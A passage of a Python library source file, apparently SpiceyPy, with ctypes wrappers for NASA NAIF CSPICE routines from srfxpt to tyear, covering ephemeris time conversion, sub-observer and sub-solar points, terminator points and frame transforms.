    :type dvec: 3-Element Array of floats
    :return:
            Surface intercept point on the target body,
            Distance from the observer to the intercept point,
            Intercept epoch,
            Observer position relative to target center.
    :rtype: tuple
    """
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    c_dref = stypes.stringToCharP(dref)
    c_dvec = stypes.toDoubleVector(dvec)
    # Output slots, reused on every call.
    spoint = stypes.emptyDoubleVector(3)
    trgepc = ctypes.c_double()
    dist = ctypes.c_double()
    obspos = stypes.emptyDoubleVector(3)
    found = ctypes.c_int()
    if not hasattr(et, "__iter__"):
        # Scalar epoch: single call, single result tuple.
        libspice.srfxpt_c(c_method, c_target, ctypes.c_double(et), c_abcorr,
                          c_obsrvr, c_dref, c_dvec, spoint,
                          ctypes.byref(dist), ctypes.byref(trgepc), obspos,
                          ctypes.byref(found))
        return (stypes.cVectorToPython(spoint), dist.value, trgepc.value,
                stypes.cVectorToPython(obspos), bool(found.value))
    # Vectorized epoch: accumulate one result per input time.
    spoints, dists, trgepcs, obsposs, founds = [], [], [], [], []
    for t in et:
        libspice.srfxpt_c(c_method, c_target, t, c_abcorr, c_obsrvr, c_dref,
                          c_dvec, spoint, ctypes.byref(dist),
                          ctypes.byref(trgepc), obspos, ctypes.byref(found))
        # Surface errors inside the loop must be raised immediately.
        checkForSpiceError(None)
        spoints.append(stypes.cVectorToPython(spoint))
        dists.append(dist.value)
        trgepcs.append(trgepc.value)
        obsposs.append(stypes.cVectorToPython(obspos))
        founds.append(bool(found.value))
    return spoints, dists, trgepcs, obsposs, founds
@spiceErrorCheck
def ssize(newsize, cell):
    """
    Set the size (maximum cardinality) of a CSPICE cell of any data type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ssize_c.html

    :param newsize: Size (maximum cardinality) of the cell.
    :type newsize: int
    :param cell: The cell.
    :type cell: spiceypy.utils.support_types.SpiceCell
    :return: The updated cell.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Only SpiceCell instances may be resized through this wrapper.
    assert isinstance(cell, stypes.SpiceCell)
    c_newsize = ctypes.c_int(newsize)
    libspice.ssize_c(c_newsize, ctypes.byref(cell))
    return cell
@spiceErrorCheck
def stelab(pobj, vobs):
    """
    Correct the apparent position of an object for stellar
    aberration.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/stelab_c.html

    :param pobj: Position of an object with respect to the observer.
    :type pobj: 3-Element Array of floats
    :param vobs:
                Velocity of the observer with respect
                to the Solar System barycenter.
    :type vobs: 3-Element Array of floats
    :return:
            Apparent position of the object with respect to
            the observer, corrected for stellar aberration.
    :rtype: 3-Element Array of floats
    """
    c_pobj = stypes.toDoubleVector(pobj)
    c_vobs = stypes.toDoubleVector(vobs)
    # Output: aberration-corrected apparent position.
    appobj = stypes.emptyDoubleVector(3)
    libspice.stelab_c(c_pobj, c_vobs, appobj)
    return stypes.cVectorToPython(appobj)
@spiceErrorCheck
@spiceFoundExceptionThrower
def stpool(item, nth, contin, lenout=_default_len_out):
    """
    Retrieve the nth string from the kernel pool variable, where the
    string may be continued across several components of the kernel pool
    variable.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/stpool_c.html

    :param item: Name of the kernel pool variable.
    :type item: str
    :param nth: Index of the full string to retrieve.
    :type nth: int
    :param contin: Character sequence used to indicate continuation.
    :type contin: str
    :param lenout: Available space in output string.
    :type lenout: int
    :return:
            A full string concatenated across continuations,
            The number of characters in the full string value.
    :rtype: tuple
    """
    c_item = stypes.stringToCharP(item)
    c_contin = stypes.stringToCharP(contin)
    c_nth = ctypes.c_int(nth)
    # Allocate the output buffer before lenout becomes a ctypes int.
    strout = stypes.stringToCharP(lenout)
    c_lenout = ctypes.c_int(lenout)
    found = ctypes.c_int()
    sizet = ctypes.c_int()
    libspice.stpool_c(c_item, c_nth, c_contin, c_lenout, strout,
                      ctypes.byref(sizet), ctypes.byref(found))
    return stypes.toPythonString(strout), sizet.value, bool(found.value)
@spiceErrorCheck
def str2et(time):
    """
    Convert a string representing an epoch to a double precision
    value representing the number of TDB seconds past the J2000
    epoch corresponding to the input epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/str2et_c.html

    :param time: A string representing an epoch, or an iterable of
                 such strings (list, tuple or numpy array), in which
                 case an array of ETs is returned.
    :type time: str or list/tuple/ndarray of str
    :return: The equivalent value in seconds past J2000, TDB.
    :rtype: float or numpy.ndarray
    """
    # Generalized vectorization: previously only a ``list`` triggered the
    # element-wise path; tuples and numpy arrays now work the same way.
    # (``hasattr(time, "__iter__")`` is unusable here because strings are
    # themselves iterable.)
    if isinstance(time, (list, tuple, numpy.ndarray)):
        return numpy.array([str2et(t) for t in time])
    time = stypes.stringToCharP(time)
    et = ctypes.c_double()
    libspice.str2et_c(time, ctypes.byref(et))
    return et.value
@spiceErrorCheck
def subpnt(method, target, et, fixref, abcorr, obsrvr):
    """
    Compute the rectangular coordinates of the sub-observer point on
    a target body at a specified epoch, optionally corrected for
    light time and stellar aberration.

    This routine supersedes :func:`subpt`.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpnt_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :return:
            Sub-observer point on the target body,
            Sub-observer point epoch,
            Vector from observer to sub-observer point.
    :rtype: tuple
    """
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_fixref = stypes.stringToCharP(fixref)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    # Outputs: sub-observer point, its epoch, observer-to-point vector.
    spoint = stypes.emptyDoubleVector(3)
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    libspice.subpnt_c(c_method, c_target, c_et, c_fixref, c_abcorr, c_obsrvr,
                      spoint, ctypes.byref(trgepc), srfvec)
    return (stypes.cVectorToPython(spoint), trgepc.value,
            stypes.cVectorToPython(srfvec))
@spiceErrorCheck
def subpt(method, target, et, abcorr, obsrvr):
    """
    Deprecated: This routine has been superseded by the CSPICE
    routine :func:`subpnt`. This routine is supported for purposes of
    backward compatibility only.

    Compute the rectangular coordinates of the sub-observer point on
    a target body at a particular epoch, optionally corrected for
    planetary (light time) and stellar aberration. Return these
    coordinates expressed in the body-fixed frame associated with the
    target body. Also, return the observer's altitude above the
    target body.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subpt_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: Union[float,Iterable[float]]
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :return:
            Sub-observer point on the target body,
            Altitude of the observer above the target body.
    :rtype: tuple
    """
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    # Output slots, reused on every call.
    spoint = stypes.emptyDoubleVector(3)
    alt = ctypes.c_double()
    if not hasattr(et, "__iter__"):
        # Scalar epoch: single call, single (point, altitude) pair.
        libspice.subpt_c(c_method, c_target, ctypes.c_double(et), c_abcorr,
                         c_obsrvr, spoint, ctypes.byref(alt))
        return stypes.cVectorToPython(spoint), alt.value
    # Vectorized epoch: one result pair per input time.
    points, alts = [], []
    for t in et:
        libspice.subpt_c(c_method, c_target, ctypes.c_double(t), c_abcorr,
                         c_obsrvr, spoint, ctypes.byref(alt))
        # Surface errors inside the loop must be raised immediately.
        checkForSpiceError(None)
        points.append(stypes.cVectorToPython(spoint))
        alts.append(alt.value)
    return points, alts
@spiceErrorCheck
def subslr(method, target, et, fixref, abcorr, obsrvr):
    """
    Compute the rectangular coordinates of the sub-solar point on
    a target body at a specified epoch, optionally corrected for
    light time and stellar aberration.

    This routine supersedes subsol_c.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subslr_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :return:
            Sub-solar point on the target body,
            Sub-solar point epoch,
            Vector from observer to sub-solar point.
    :rtype: tuple
    """
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_fixref = stypes.stringToCharP(fixref)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    # Outputs: sub-solar point, its epoch, observer-to-point vector.
    spoint = stypes.emptyDoubleVector(3)
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    libspice.subslr_c(c_method, c_target, c_et, c_fixref, c_abcorr, c_obsrvr,
                      spoint, ctypes.byref(trgepc), srfvec)
    return (stypes.cVectorToPython(spoint), trgepc.value,
            stypes.cVectorToPython(srfvec))
@spiceErrorCheck
def subsol(method, target, et, abcorr, obsrvr):
    """
    Deprecated: This routine has been superseded by the CSPICE
    routine :func:`subslr`. This routine is supported for purposes of
    backward compatibility only.

    Determine the coordinates of the sub-solar point on a target
    body as seen by a specified observer at a specified epoch,
    optionally corrected for planetary (light time) and stellar
    aberration.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subsol_c.html

    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :return: Sub-solar point on the target body.
    :rtype: 3-Element Array of floats
    """
    c_method = stypes.stringToCharP(method)
    c_target = stypes.stringToCharP(target)
    c_et = ctypes.c_double(et)
    c_abcorr = stypes.stringToCharP(abcorr)
    c_obsrvr = stypes.stringToCharP(obsrvr)
    # Output: rectangular coordinates of the sub-solar point.
    spoint = stypes.emptyDoubleVector(3)
    libspice.subsol_c(c_method, c_target, c_et, c_abcorr, c_obsrvr, spoint)
    return stypes.cVectorToPython(spoint)
@spiceErrorCheck
def sumad(array):
    """
    Return the sum of the elements of a double precision array.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sumad_c.html

    :param array: Input Array.
    :type array: Array of floats
    :return: The sum of the array.
    :rtype: float
    """
    # Element count must be captured before the array is converted.
    c_n = ctypes.c_int(len(array))
    c_array = stypes.toDoubleVector(array)
    return libspice.sumad_c(c_array, c_n)
@spiceErrorCheck
def sumai(array):
    """
    Return the sum of the elements of an integer array.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sumai_c.html

    :param array: Input Array.
    :type array: Array of ints
    :return: The sum of the array.
    :rtype: int
    """
    # Element count must be captured before the array is converted.
    c_n = ctypes.c_int(len(array))
    c_array = stypes.toIntVector(array)
    return libspice.sumai_c(c_array, c_n)
@spiceErrorCheck
def surfnm(a, b, c, point):
    """
    This routine computes the outward-pointing, unit normal vector
    from a point on the surface of an ellipsoid.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfnm_c.html

    :param a: Length of the ellipsoid semi-axis along the x-axis.
    :type a: float
    :param b: Length of the ellipsoid semi-axis along the y-axis.
    :type b: float
    :param c: Length of the ellipsoid semi-axis along the z-axis.
    :type c: float
    :param point: Body-fixed coordinates of a point on the ellipsoid.
    :type point: 3-Element Array of floats
    :return: Outward pointing unit normal to ellipsoid at point.
    :rtype: 3-Element Array of floats
    """
    c_a = ctypes.c_double(a)
    c_b = ctypes.c_double(b)
    c_c = ctypes.c_double(c)
    c_point = stypes.toDoubleVector(point)
    # Output: unit normal at the given surface point.
    normal = stypes.emptyDoubleVector(3)
    libspice.surfnm_c(c_a, c_b, c_c, c_point, normal)
    return stypes.cVectorToPython(normal)
@spiceErrorCheck
@spiceFoundExceptionThrower
def surfpt(positn, u, a, b, c):
    """
    Determine the intersection of a line-of-sight vector with the
    surface of an ellipsoid.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfpt_c.html

    :param positn: Position of the observer in body-fixed frame.
    :type positn: 3-Element Array of floats
    :param u: Vector from the observer in some direction.
    :type u: 3-Element Array of floats
    :param a: Length of the ellipsoid semi-axis along the x-axis.
    :type a: float
    :param b: Length of the ellipsoid semi-axis along the y-axis.
    :type b: float
    :param c: Length of the ellipsoid semi-axis along the z-axis.
    :type c: float
    :return: Point on the ellipsoid pointed to by u.
    :rtype: 3-Element Array of floats
    """
    c_positn = stypes.toDoubleVector(positn)
    c_u = stypes.toDoubleVector(u)
    c_a = ctypes.c_double(a)
    c_b = ctypes.c_double(b)
    c_c = ctypes.c_double(c)
    # Outputs: intercept point plus a found flag consumed by the
    # found-exception decorator.
    point = stypes.emptyDoubleVector(3)
    found = ctypes.c_int()
    libspice.surfpt_c(c_positn, c_u, c_a, c_b, c_c, point,
                      ctypes.byref(found))
    return stypes.cVectorToPython(point), bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def surfpv(stvrtx, stdir, a, b, c):
    """
    Find the state (position and velocity) of the surface intercept
    defined by a specified ray, ray velocity, and ellipsoid.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfpv_c.html

    :param stvrtx: State of ray's vertex.
    :type stvrtx: 6-Element Array of floats
    :param stdir: State of ray's direction vector.
    :type stdir: 6-Element Array of floats
    :param a: Length of the ellipsoid semi-axis along the x-axis.
    :type a: float
    :param b: Length of the ellipsoid semi-axis along the y-axis.
    :type b: float
    :param c: Length of the ellipsoid semi-axis along the z-axis.
    :type c: float
    :return: State of surface intercept.
    :rtype: list
    """
    c_stvrtx = stypes.toDoubleVector(stvrtx)
    c_stdir = stypes.toDoubleVector(stdir)
    c_a = ctypes.c_double(a)
    c_b = ctypes.c_double(b)
    c_c = ctypes.c_double(c)
    # Outputs: 6-element intercept state plus a found flag consumed by
    # the found-exception decorator.
    stx = stypes.emptyDoubleVector(6)
    found = ctypes.c_int()
    libspice.surfpv_c(c_stvrtx, c_stdir, c_a, c_b, c_c, stx,
                      ctypes.byref(found))
    return stypes.cVectorToPython(stx), bool(found.value)
@spiceErrorCheck
def swpool(agent, nnames, lenvals, names):
    """
    Add a name to the list of agents to notify whenever a member of
    a list of kernel variables is updated.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/swpool_c.html

    :param agent: The name of an agent to be notified after updates.
    :type agent: str
    :param nnames: The number of variables to associate with agent.
    :type nnames: int
    :param lenvals: Length of strings in the names array.
    :type lenvals: int
    :param names: Variable names whose update causes the notice.
    :type names: list of strs.
    """
    c_agent = stypes.stringToCharP(agent)
    c_nnames = ctypes.c_int(nnames)
    c_lenvals = ctypes.c_int(lenvals)
    c_names = stypes.listToCharArray(names)
    libspice.swpool_c(c_agent, c_nnames, c_lenvals, c_names)
@spiceErrorCheck
def sxform(instring, tostring, et):
    """
    Return the state transformation matrix from one frame to
    another at a specified epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sxform_c.html

    :param instring: Name of the frame to transform from.
    :type instring: str
    :param tostring: Name of the frame to transform to.
    :type tostring: str
    :param et: Epoch of the state transformation matrix.
    :type et: Union[float,Iterable[float]]
    :return: A state transformation matrix.
    :rtype: 6x6-Element Array of floats
    """
    c_instring = stypes.stringToCharP(instring)
    c_tostring = stypes.stringToCharP(tostring)
    # Output buffer, reused on every call.
    xform = stypes.emptyDoubleMatrix(x=6, y=6)
    if not hasattr(et, "__iter__"):
        # Scalar epoch: a single 6x6 matrix.
        libspice.sxform_c(c_instring, c_tostring, ctypes.c_double(et), xform)
        return stypes.cMatrixToNumpy(xform)
    # Vectorized epoch: one matrix per input time.
    xforms = []
    for t in et:
        libspice.sxform_c(c_instring, c_tostring, ctypes.c_double(t), xform)
        # Surface errors inside the loop must be raised immediately.
        checkForSpiceError(None)
        xforms.append(stypes.cMatrixToNumpy(xform))
    return xforms
@spiceErrorCheck
@spiceFoundExceptionThrower
def szpool(name):
    """
    Return the kernel pool size limitations.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/szpool_c.html

    :param name: Name of the parameter to be returned.
    :type name: str
    :return: Value of parameter specified by name.
    :rtype: int
    """
    c_name = stypes.stringToCharP(name)
    # Outputs: parameter value and a found flag consumed by the
    # found-exception decorator.
    n = ctypes.c_int()
    found = ctypes.c_int(0)
    libspice.szpool_c(c_name, ctypes.byref(n), ctypes.byref(found))
    return n.value, bool(found.value)
################################################################################
# T
@spiceErrorCheck
def termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp,
           ncuts, schstp, soltol, maxn):
    """
    Find terminator points on a target body. The caller specifies
    half-planes, bounded by the illumination source center-target center
    vector, in which to search for terminator points.

    The terminator can be either umbral or penumbral. The umbral
    terminator is the boundary of the region on the target surface
    where no light from the source is visible. The penumbral
    terminator is the boundary of the region on the target surface
    where none of the light from the source is blocked by the target
    itself.

    The surface of the target body may be represented either by a
    triaxial ellipsoid or by topographic data.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/termpt_c.html

    :param method: Computation method.
    :type method: str
    :param ilusrc: Illumination source.
    :type ilusrc: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param corloc: Aberration correction locus.
    :type corloc: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param refvec: Reference vector for cutting half-planes.
    :type refvec: 3-Element Array of floats
    :param rolstp: Roll angular step for cutting half-planes.
    :type rolstp: float
    :param ncuts: Number of cutting half-planes.
    :type ncuts: int
    :param schstp: Angular step size for searching.
    :type schstp: float
    :param soltol: Solution convergence tolerance.
    :type soltol: float
    :param maxn: Maximum number of entries in output arrays.
    :type maxn: int
    :return: Counts of terminator points corresponding to cuts, Terminator points, Times associated with terminator points, Terminator vectors emanating from the observer
    :rtype: tuple
    """
    method = stypes.stringToCharP(method)
    ilusrc = stypes.stringToCharP(ilusrc)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    corloc = stypes.stringToCharP(corloc)
    obsrvr = stypes.stringToCharP(obsrvr)
    refvec = stypes.toDoubleVector(refvec)
    rolstp = ctypes.c_double(rolstp)
    ncuts = ctypes.c_int(ncuts)
    schstp = ctypes.c_double(schstp)
    soltol = ctypes.c_double(soltol)
    maxn = ctypes.c_int(maxn)
    # Output buffers, all sized from the plain int maxn.value.
    # (Fix: the epochs buffer previously received the ctypes.c_int object
    # itself, inconsistent with the sibling buffers.)
    npts = stypes.emptyIntVector(maxn.value)
    points = stypes.emptyDoubleMatrix(3, maxn.value)
    epochs = stypes.emptyDoubleVector(maxn.value)
    trmvcs = stypes.emptyDoubleMatrix(3, maxn.value)
    libspice.termpt_c(method, ilusrc, target, et, fixref,
                      abcorr, corloc, obsrvr, refvec,
                      rolstp, ncuts, schstp, soltol,
                      maxn, npts, points, epochs, trmvcs)
    # Clip the empty elements out of returned results: keep only the
    # cuts that actually produced at least one terminator point.
    npts = stypes.cVectorToPython(npts)
    valid_points = numpy.where(npts >= 1)
    return npts[valid_points], stypes.cMatrixToNumpy(points)[valid_points], \
           stypes.cVectorToPython(epochs)[valid_points], \
           stypes.cMatrixToNumpy(trmvcs)[valid_points]
@spiceErrorCheck
def timdef(action, item, lenout, value=None):
    """
    Set and retrieve the defaults associated with calendar input strings.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/timdef_c.html

    :param action: the kind of action to take "SET" or "GET".
    :type action: str
    :param item: the default item of interest.
    :type item: str
    :param lenout: the length of list for output.
    :type lenout: int
    :param value: the optional string used if action is "SET"
    :type value: str
    :return: the value associated with the default item.
    :rtype: str
    """
    c_action = stypes.stringToCharP(action)
    c_item = stypes.stringToCharP(item)
    c_lenout = ctypes.c_int(lenout)
    # With no value supplied ("GET"), allocate an output buffer of
    # lenout characters; otherwise marshal the caller's string ("SET").
    c_value = stypes.stringToCharP(lenout if value is None else value)
    libspice.timdef_c(c_action, c_item, c_lenout, c_value)
    return stypes.toPythonString(c_value)
@spiceErrorCheck
def timout(et, pictur, lenout=_default_len_out):
    """
    This vectorized routine converts an input epoch represented in TDB seconds
    past the TDB epoch of J2000 to a character string formatted to
    the specifications of a user's format picture.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/timout_c.html

    :param et: An epoch in seconds past the ephemeris epoch J2000.
    :type et: Union[float,Iterable[float]]
    :param pictur: A format specification for the output string.
    :type pictur: str
    :param lenout: The length of the output string plus 1.
    :type lenout: int
    :return: A string representation of the input epoch.
    :rtype: str or array of str
    """
    c_pictur = stypes.stringToCharP(pictur)
    # Allocate the output buffer before lenout becomes a ctypes int.
    output = stypes.stringToCharP(lenout)
    c_lenout = ctypes.c_int(lenout)
    if not hasattr(et, "__iter__"):
        # Scalar epoch: a single formatted string.
        libspice.timout_c(ctypes.c_double(et), c_pictur, c_lenout, output)
        return stypes.toPythonString(output)
    # Vectorized epoch: one formatted string per input time.
    times = []
    for t in et:
        libspice.timout_c(ctypes.c_double(t), c_pictur, c_lenout, output)
        # Surface errors inside the loop must be raised immediately.
        checkForSpiceError(None)
        times.append(stypes.toPythonString(output))
    return times
@spiceErrorCheck
def tipbod(ref, body, et):
    """
    Return a 3x3 matrix that transforms positions in inertial
    coordinates to positions in body-equator-and-prime-meridian
    coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tipbod_c.html

    :param ref: ID of inertial reference frame to transform from.
    :type ref: str
    :param body: ID code of body.
    :type body: int
    :param et: Epoch of transformation.
    :type et: float
    :return: Transformation (position), inertial to prime meridian.
    :rtype: 3x3-Element Array of floats
    """
    c_ref = stypes.stringToCharP(ref)
    c_body = ctypes.c_int(body)
    c_et = ctypes.c_double(et)
    # Output: 3x3 position transformation matrix.
    retmatrix = stypes.emptyDoubleMatrix()
    libspice.tipbod_c(c_ref, c_body, c_et, retmatrix)
    return stypes.cMatrixToNumpy(retmatrix)
@spiceErrorCheck
def tisbod(ref, body, et):
    """
    Return a 6x6 matrix that transforms states in inertial coordinates to
    states in body-equator-and-prime-meridian coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tisbod_c.html

    :param ref: ID of inertial reference frame to transform from.
    :type ref: str
    :param body: ID code of body.
    :type body: int
    :param et: Epoch of transformation.
    :type et: float
    :return: Transformation (state), inertial to prime meridian.
    :rtype: 6x6-Element Array of floats
    """
    c_ref = stypes.stringToCharP(ref)
    c_body = ctypes.c_int(body)
    c_et = ctypes.c_double(et)
    # Output: 6x6 state transformation matrix.
    retmatrix = stypes.emptyDoubleMatrix(x=6, y=6)
    libspice.tisbod_c(c_ref, c_body, c_et, retmatrix)
    return stypes.cMatrixToNumpy(retmatrix)
# @spiceErrorCheck
def tkvrsn(item):
    """
    Given an item such as the Toolkit or an entry point name, return
    the latest version string.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tkvrsn_c.html

    :param item: Item for which a version string is desired.
    :type item: str
    :return: the latest version string.
    :rtype: str
    """
    c_item = stypes.stringToCharP(item)
    # tkvrsn_c returns the version string directly; convert it back
    # into a Python string.
    return stypes.toPythonString(libspice.tkvrsn_c(c_item))
@spiceErrorCheck
def tparse(instring, lenout=_default_len_out):
    """
    Parse a time string and return seconds past the J2000
    epoch on a formal calendar.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tparse_c.html
    :param instring: Input time string, UTC.
    :type instring: str
    :param lenout: Available space in output error message string.
    :type lenout: int
    :return: Equivalent UTC seconds past J2000, Descriptive error message.
    :rtype: tuple
    """
    sp2000 = ctypes.c_double()
    # Error-message buffer; empty on success.
    errmsg = stypes.stringToCharP(lenout)
    libspice.tparse_c(stypes.stringToCharP(instring), ctypes.c_int(lenout),
                      ctypes.byref(sp2000), errmsg)
    return sp2000.value, stypes.toPythonString(errmsg)
@spiceErrorCheck
def tpictr(sample, lenout=_default_len_out, lenerr=_default_len_out):
    """
    Given a sample time string, create a time format picture
    suitable for use by the routine timout.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tpictr_c.html
    :param sample: A sample time string.
    :type sample: str
    :param lenout: The length for the output picture string.
    :type lenout: int
    :param lenerr: The length for the output error string.
    :type lenerr: int
    :return:
            A format picture that describes sample,
            Flag indicating whether sample parsed successfully,
            Diagnostic returned if sample cannot be parsed
    :rtype: tuple
    """
    # Output buffers: format picture and diagnostic message.
    pictur = stypes.stringToCharP(lenout)
    errmsg = stypes.stringToCharP(lenerr)
    ok = ctypes.c_int()
    libspice.tpictr_c(stypes.stringToCharP(sample), ctypes.c_int(lenout),
                      ctypes.c_int(lenerr), pictur, ctypes.byref(ok), errmsg)
    return (stypes.toPythonString(pictur), ok.value,
            stypes.toPythonString(errmsg))
@spiceErrorCheck
def trace(matrix):
    """
    Return the trace of a 3x3 matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trace_c.html
    :param matrix: 3x3 matrix of double precision numbers.
    :type matrix: 3x3-Element Array of floats
    :return: The trace of matrix.
    :rtype: float
    """
    return libspice.trace_c(stypes.toDoubleMatrix(matrix))
@spiceErrorCheck
def trcdep():
    """
    Return the number of modules in the traceback representation.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcdep_c.html
    :return: The number of modules in the traceback.
    :rtype: int
    """
    # trcdep_c reports its result through an output argument.
    depth = ctypes.c_int()
    libspice.trcdep_c(ctypes.byref(depth))
    return depth.value
@spiceErrorCheck
def trcnam(index, namlen=_default_len_out):
    """
    Return the name of the module having the specified position in
    the trace representation. The first module to check in is at
    index 0.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcnam_c.html
    :param index: The position of the requested module name.
    :type index: int
    :param namlen: Available space in output name string.
    :type namlen: int
    :return: The name at position index in the traceback.
    :rtype: str
    """
    # Buffer receiving the module name.
    name = stypes.stringToCharP(namlen)
    libspice.trcnam_c(ctypes.c_int(index), ctypes.c_int(namlen), name)
    return stypes.toPythonString(name)
@spiceErrorCheck
def trcoff():
    """
    Disable tracing.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcoff_c.html
    """
    # No arguments, no return value: this simply toggles CSPICE state.
    libspice.trcoff_c()
@spiceErrorCheck
def tsetyr(year):
    """
    Set the lower bound on the 100 year range.
    Default value is 1969
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tsetyr_c.html
    :param year: Lower bound on the 100 year interval of expansion
    :type year: int
    """
    libspice.tsetyr_c(ctypes.c_int(year))
@spiceErrorCheck
def twopi():
    """
    Return twice the value of pi
    (the ratio of the circumference of a circle to its diameter).
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/twopi_c.html
    :return: Twice the value of pi.
    :rtype: float
    """
    # Constant comes straight from CSPICE for bit-for-bit agreement
    # with the toolkit.
    return libspice.twopi_c()
@spiceErrorCheck
def twovec(axdef, indexa, plndef, indexp):
    """
    Find the transformation to the right-handed frame having a
    given vector as a specified axis and having a second given
    vector lying in a specified coordinate plane.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/twovec_c.html
    :param axdef: Vector defining a principal axis.
    :type axdef: 3-Element Array of floats
    :param indexa: Principal axis number of axdef (X=1, Y=2, Z=3).
    :type indexa: int
    :param plndef: Vector defining (with axdef) a principal plane.
    :type plndef: 3-Element Array of floats
    :param indexp: Second axis number (with indexa) of principal plane.
    :type indexp: int
    :return: Output rotation matrix.
    :rtype: 3x3-Element Array of floats
    """
    mout = stypes.emptyDoubleMatrix()
    libspice.twovec_c(stypes.toDoubleVector(axdef), ctypes.c_int(indexa),
                      stypes.toDoubleVector(plndef), ctypes.c_int(indexp),
                      mout)
    return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def txtopn(fname):
    """
    Internal undocumented command for opening a new text file for
    subsequent write access.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html#Files
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html#Examples
    :param fname: name of the new text file to be opened.
    :type fname: str
    :return: FORTRAN logical unit of opened file
    :rtype: int
    """
    unit_out = ctypes.c_int()
    # txtopn_ is a raw f2c entry point: the string's length is passed
    # as a trailing hidden argument, FORTRAN-style.
    libspice.txtopn_(stypes.stringToCharP(fname), ctypes.byref(unit_out),
                     ctypes.c_int(len(fname)))
    return unit_out.value
@spiceErrorCheck
def tyear():
    """
    Return the number of seconds in a tropical year.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tyear_c.html
    :return: The number of seconds in a tropical year.
    :rtype: float
    """
    # Delegate to CSPICE so the constant matches the toolkit exactly.
    return libspice.tyear_c()
################################################################################
# U
